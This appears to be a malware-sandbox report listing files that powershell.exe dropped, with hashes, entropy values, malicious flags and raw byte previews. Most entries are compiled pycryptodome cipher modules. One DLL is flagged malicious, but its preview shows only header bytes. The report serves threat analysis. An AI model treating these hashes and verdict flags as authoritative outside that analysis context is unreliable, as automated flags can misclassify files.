                                                                                                                                                                                                              Preview:........)m.e!..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with ARC2:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_arc2a?.... int ARC2_start_operation(const uint8_t key[],. size_t key_len,. size_t effective_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4895
                                                                                                                                                                                                              Entropy (8bit):5.35765837270433
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:N87/a6kvs0xDewWtft8r9Dkx5Qkkbg+tqzq2V6KzA7:+7/ypYClkSEOqe2V6EA7
                                                                                                                                                                                                              MD5:AAFABE2E680739A38F24EC68E681DDDE
                                                                                                                                                                                                              SHA1:44E3A31463A0B645E2203364829837B1994B852F
                                                                                                                                                                                                              SHA-256:67C5C850508E6BF9BBF52AA1DA1279F3D63D2671243E4DA1E903A37A3C6CAB63
                                                                                                                                                                                                              SHA-512:6101D0D529FB8A8F775254FCE2F2C8C578AFB0E47D09814DABA9EAA1E80F090CB3C264B7C1AE700F418A4BEE841804742FE2C66E61C1EC2D2436237387C4DAF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e..........................j.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.........Z.d...Z.d.Z...e.d.d.........Z.y.)......)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._ARC4al.... int ARC4_stream_encrypt(void *rc4State, const uint8_t in[],. uint8_t out[], size_t len);. int ARC4_stream_init(uint8_t *key, size_t keylen,. void **pRc4State);. int ARC4_stream_destroy(void *rc4State);. c.....................".....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.y.)...ARC4CipherzgARC4 cipher object. Do not create it directly. Use. :func:`Cryptodome.Cipher.ARC4.new` instead.. c.....................P.....t.........|.........d.kD..r.|.d.....}.|.d.d...}.n.|.j...................d.d.........}.t.........|.........t.........v.r.t......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5673
                                                                                                                                                                                                              Entropy (8bit):5.380000467438241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Z8uYWfcCYUi//MW7PfmPtLAvE4AOLlsEgggMv:WgG13p7fmPtcfJBsEggge
                                                                                                                                                                                                              MD5:64E798D8128EF1B2EF557285AC438DF8
                                                                                                                                                                                                              SHA1:F321EB4DD9413793FD2E7013766CB6361CB1164F
                                                                                                                                                                                                              SHA-256:1B973FBE8FA133EA2CDFD70E99B0C605A4880BA4184B2478755C4D91D89F1587
                                                                                                                                                                                                              SHA-512:CBFA355A9B78AD7FE71C0A770116E65779E9839446C32485C0C95CAD2B9CE00229E47A40E71B741191ABA630BC054194BC658D8CDA8DFB3C7692E2712221736B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with Blowfish:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_blowfishaT.... int Blowfish_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int Blowfish_encrypt(const void *state,.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5788
                                                                                                                                                                                                              Entropy (8bit):5.337218777586967
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/BD+8EOtxG9UQ/XarOuezUFmz/tLAvE4HRLlIrrSMgggM6:Joq89UEXauzUFmz/tcfxBQSMgggT
                                                                                                                                                                                                              MD5:4ED7BB525CA6CA7CD57D39B532108E92
                                                                                                                                                                                                              SHA1:02C37D6F74FCC530796C8474F9781669ACD0ED54
                                                                                                                                                                                                              SHA-256:EEE5491D7AD2279947564D1C2068E23C0606C555F6C1098E96A787560F8AB29B
                                                                                                                                                                                                              SHA-512:66145885CF94ADC889E0D558E2B938908146498D9473EFC5E01AB546958C1656BD36A410237C3CE555F4293E5F6F7533A4DF0D89F7168A4EC73D2C4C774584F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.ef..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with CAST:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_casta..... int CAST_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10010
                                                                                                                                                                                                              Entropy (8bit):5.353089190891848
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/OFrhM02bMOimuaM3P7KD9bIpHVFQjsdUMN0JiUcPWFPZ5+:GLM02bximwPGD9bEVFPdUbwUcPoP7+
                                                                                                                                                                                                              MD5:80E775CB9580DE9111EB6792A25E4598
                                                                                                                                                                                                              SHA1:C04394F7E551A0BC4B4C4C38B7D40AA9D841AB9D
                                                                                                                                                                                                              SHA-256:EAD4F3DCC9E95C668005FB54C33B13433673668F770A032C94FE2DC68910D42B
                                                                                                                                                                                                              SHA-512:2BAF609630917F38EE831F4D55B098CA05092D25E0544A037564A454DCEDE0CD237EFA9080E9E2E55C6828F43AF1DE0E520523AD243791102B18AEC0C8C2693A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e#+.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z...G.d...d.e.........Z.d...Z.d...Z.d.Z.d.Z.y.)......)...get_random_bytes)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_ulong..is_writeable_bufferz.Cryptodome.Cipher._chacha20a..... int chacha20_init(void **pState,. const uint8_t *key,. size_t keySize,. const uint8_t *nonce,. size_t nonceSize);.. int chacha20_destroy(void *state);.. int chacha20_encrypt(void *state,. const uint8_t in[],. uint8_t out[],. size_t len);.. int chacha2
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13462
                                                                                                                                                                                                              Entropy (8bit):5.288983638447428
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:FcN1i/mPJoCle5i4f1WdAHqyRoe8dumA++f0dBaBqoVCXn+k:+riOPJO1UiqyRoe2HA+bEBC3+k
                                                                                                                                                                                                              MD5:C4625F795A36B8CD9F4417A4B67D17F5
                                                                                                                                                                                                              SHA1:5945043C70A55F8F149940601F97D561DEC37941
                                                                                                                                                                                                              SHA-256:F5E8C7BB5BA220E3899175C8DDC33E2900C81532336C559FF6408ED4987F7E4B
                                                                                                                                                                                                              SHA-512:5FFDF07EDD5FC0C3E6EA2978D67F3F5CBEF57A855F60EF5FDD72FEB3F76C2B9B114AFF892A7D5BD9E95488708D1E099F5B8A6181D5C94A4E81BC0A943B599182
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z...e.d.d.d...........Z...G.d...d.e.........Z.d...Z.d.Z.y.)......)...unhexlify)...ChaCha20)..._HChaCha20)...Poly1305..BLAKE2s)...get_random_bytes)...long_to_bytes)..._copy_bytes..bord)...is_bufferc...........................t.........d.d.|.........S.).N..Enum..)...type)...enumss.... .wC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Cryptodome/Cipher/ChaCha20_Poly1305.py.._enumr....,...s..............E..".."....................)...PROCESSING_AUTH_DATA..PROCESSING_CIPHERTEXT..PROCESSING_DONEc.....................\.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...ChaCha20Poly1305Cipherz.ChaCha20-Poly1305 and XChaCha20-Poly1305 cipher object.. Do not create it directly. Use :py:func:`new` instead... :var nonce: The nonce with length 8, 12 or 24 bytes.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5662
                                                                                                                                                                                                              Entropy (8bit):5.34759215526524
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tDYaCGeGx/er564x6stLAv74Q+bLlnrSRaEgggMP:t1xpeM4ftcsBBrSRlgggY
                                                                                                                                                                                                              MD5:CD5BA94FCCB2C47BDCBCA3755AD29E79
                                                                                                                                                                                                              SHA1:B93C0E8F5958C5D31F439763F8488233FE4ECD19
                                                                                                                                                                                                              SHA-256:12E8D3EF7515BEC4793C82A77C87E588273740E25359924EFFEF11DFF523503E
                                                                                                                                                                                                              SHA-512:4725DE9F9064ABB3B62ABC8CC21D5B2161C0A8C6D9B6FC47147115D7559F9AD2BE83C6888874A92BA0C2DD12819F7ACFC08A6CBBC50D869B23847985560441BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(cons
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7023
                                                                                                                                                                                                              Entropy (8bit):5.440070856346476
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:7O/cO8Ljr7NkIOM7VIjKBha2QIuGkR+TiC6TtLAvE4YbiPBl3003gggM4m:Smr78MBLLXukTi/tcfYUfE03gggvm
                                                                                                                                                                                                              MD5:289BF7EB9780F5C5A48ABCA7EE57970A
                                                                                                                                                                                                              SHA1:CC60BC79888366F4A2D42CA5EB2A3C10F6CE6A2A
                                                                                                                                                                                                              SHA-256:34A18B38C9A65CF7665E8AD93F07D735013259FFBCCABFAEA10B7A3BD7A08841
                                                                                                                                                                                                              SHA-512:B84FCDE4FE22F25238DABF049AD94D9A6628D3CF494DAA28B5D38F8B98D46332E1A5149C95B9C05A429AC92F789CBD7AF499E0A4BC59CFA2154F52953DF2B161
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Cryptodome.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8989
                                                                                                                                                                                                              Entropy (8bit):5.318996715009682
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:PK37pbVxOUIqk0mudjErmoWbUfo+BT9tP7MAoOccG6IyhBoVbqdLSRRIabJvqkff:Po9W/FpT64lTH4Ao4gFqdLSXVFf2i9
                                                                                                                                                                                                              MD5:B351495E8B1B30822850A9292DB1C736
                                                                                                                                                                                                              SHA1:B6D0DC3DA127FB47A77C6EA6033A1FC2785DC693
                                                                                                                                                                                                              SHA-256:DFB674A5EA0F8F515C579B4CD626F1C4E64C55657E7D416F71A3A59230DE17C5
                                                                                                                                                                                                              SHA-512:9DDD7CF8732921C4DD5A582D0AFDB6A81511C88D82E1B88E3D17F3AECFD045D3E061DA3457567028F8344B0BC3CD1CA6A3CF146C595EA9700C982679619E452C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e.".............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.d.d...Z.y.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec...........................e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c.............................|..._.........|.r.|..._.........n.t.........j...................j....................._.........|.r.|..._.........n...f.d....._.........t.........d.d.|..........._.........|..._.........y.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7090
                                                                                                                                                                                                              Entropy (8bit):5.381218689655665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/nM2utVeY7bNuMxliDO7XePA+0OEM+78F2ON5edNeYe6Kz1TKe:/sDrMMfiCCP2l8rNkdNudKe
                                                                                                                                                                                                              MD5:78496D5BF225BC0E275D4678BD0D5294
                                                                                                                                                                                                              SHA1:2CA622E25BDECCA49E18F07B3C633FFEBF7714DC
                                                                                                                                                                                                              SHA-256:629C71B192E2866CF782F4D4794BD047FDCC700948A89926252C6653661434B3
                                                                                                                                                                                                              SHA-512:1B06AF7EA0B0619EDCDA5259C59465B9963F65B2345FA24FFD9570C6A8850BCB3BB9DAD99E1EA19DACC9636607DC25D143B707BCB539A089829BA956642EB4A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e@.........................d.....d.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z.d.d...Z.y.)...new..PKCS115_Cipher.....)...Random)...bytes_to_long..long_to_bytes)...bord..is_bytes.._copy_bytes.....)...pkcs1_decodec.....................0.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.y.).r....z.This cipher can perform PKCS#1 v1.5 RSA encryption or decryption.. Do not instantiate directly. Use :func:`Cryptodome.Cipher.PKCS1_v1_5.new` instead.c..................... .....|.|._.........|.|._.........y.).aJ...Initialize this PKCS#1 v1.5 cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. randfunc : callable. Function that returns random bytes.. N)..._key.._randfunc)...self..key..randfuncs.... .pC:\Users\Administrator\AppData\Local\Programs\Python\
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6010
                                                                                                                                                                                                              Entropy (8bit):5.301345423842706
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:VatWkv3EZO+HP2gWa/CSuzn8YIQLBwrNps7i8VvbsxPPtysd:V6TyQ+2dfFVz83
                                                                                                                                                                                                              MD5:6B8594592AE49D825B5586BBA694330F
                                                                                                                                                                                                              SHA1:FDAB15346B1FEDBBA7CEAB433A2642BF4E89F2E2
                                                                                                                                                                                                              SHA-256:215C34749736B2654C9C33FC7BB92E613B2E8018E33303D9FB4FBF9604C17452
                                                                                                                                                                                                              SHA-512:A8C4761CF98F53C93BC83E72CC7205C85B66F5CCBF739958A1272C6DB3C0F8741A593E800E4E100503D7301886EFE06999844FF859D5FF4FC798DF75AECFC840
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.........Z.d.d...Z.d.Z.d.Z.y.)......)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._Salsa20a..... int Salsa20_stream_init(uint8_t *key, size_t keylen,. uint8_t *nonce, size_t nonce_len,. void **pSalsaState);. int Salsa20_stream_destroy(void *salsaState);. int Salsa20_stream_encrypt(void *salsaState,. const uint8_t in[],. uint8_t out[], size_t len);. c.....................&.....e.Z.d.Z.d.Z.d...Z.d.d...Z.d.d...Z.y.)...Salsa20Cipherz.Salsa20 cipher object. Do not
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4419
                                                                                                                                                                                                              Entropy (8bit):5.259055201098961
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oF+mpXvaWWWaLU+0PivDDMqOTvd7moVH4ydB:W+9LU+F36l7mQD
                                                                                                                                                                                                              MD5:88B57742C90366ED1F231FDD1437C828
                                                                                                                                                                                                              SHA1:CA66CD2307A5988DC1CAFCDB379BDB31219D1E6E
                                                                                                                                                                                                              SHA-256:52741AA1700065B9808D0C0BA882261EE15686622449EA4CCCE664F9165BEDDB
                                                                                                                                                                                                              SHA-512:E9BC7416AA06CBCF4E743EA3A9835CDEA8B35C81F6335E72E436F2576CAF24568B1DFFF6D82924645A0E464831CACB5A05AF037D800D05517CDE0222364DA2A2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e..........................p.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z...e.d.d.........Z.y.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz"Cryptodome.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,. con
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9664
                                                                                                                                                                                                              Entropy (8bit):5.268347232199073
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:06kvJbQ9XIYEgUNfu4nx3ZJpSSlUeWsArt834mGvWcsQAn9rTzVt83425pKInt7C:KbJEUNfu4x3Z+H/U4czU4QnA0QtVB
                                                                                                                                                                                                              MD5:53E4773675A0D2604CCE612A5F080822
                                                                                                                                                                                                              SHA1:4533F40B78EF857666B42BD769EB8AFB9873E70D
                                                                                                                                                                                                              SHA-256:7A72EBEFB8B9AA2A055E694506FF68F99C3CCFADB83251A587B56404647FDD4C
                                                                                                                                                                                                              SHA-512:7660C16835BACFC4F2A04BA8B420464DF762DE0FD4B6EB5CEE5D5139306AA2EB5007694E527BAC755A0483AA51DE14125CE00B08D9F5C9C1AA9ACC7B9FE6581E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e.+........................|.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24768
                                                                                                                                                                                                              Entropy (8bit):5.261616742852958
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Fq/qgUTxXwBVkwI4IiJ3tiuwHytI89+381SWWNB+m7cfrmhgqF50F:FZwAIJ3t3t+W2Qm7uhF
                                                                                                                                                                                                              MD5:A120FF93497C0AC6433F7B5F9C95EF57
                                                                                                                                                                                                              SHA1:3F751D25CEB3FB514137F460E0DB6A2151C63B9E
                                                                                                                                                                                                              SHA-256:0A52E8934F9C7FC0A0E8E91387C83CFEB14D1C9B1D684B52C284340B6CED78B8
                                                                                                                                                                                                              SHA-512:C5A75EACA5181CEAB9B10CD21947DEC3C6D156F1FE5350972A3F17412E67CF8A2A24F821DD54D67A86929FA750397D271DFBA46F8570F20DFD220F8808C48842
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........)m.e.a.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...e.d.d.d...........Z...G.d...d.e.........Z.d...Z.y.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc...........................t.........d.d.|.........S.).N..Enum..)...type)...enumss.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Cryptodome/Cipher/_mode_ccm.py..enumr....3...s..............E..".."...............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc.....................n.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.y.).r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):5.061520684813544
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:cdF/1nb2mhQtkXn0t/WS60YYDEbqvdvGyv9lkVcqgYvEMo:e2f6XSZ6XYD5vdvGyv9MgYvEMo
                                                                                                                                                                                                              MD5:E2AB7EECFD020CFDEBA6DD3ADD732EB7
                                                                                                                                                                                                              SHA1:26975087F7AC8001830CAD4151003DBCABF82126
                                                                                                                                                                                                              SHA-256:85BCF0FD811ADE1396E3A93EEEF6BC6B88D5555498BA09C164FAA3092DACDEFF
                                                                                                                                                                                                              SHA-512:EB45126A07128E0FA8DC2B687F833BA95BB8703D7BC06E5C34F828EAEF062CFCA56D8A51A73B20DFA771595F6C6D830B659B5C0EB62467C61E95C97C4A73398D
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11201
                                                                                                                                                                                                              Entropy (8bit):4.610327962054972
                                                                                                                                                                                                              Encrypted:false
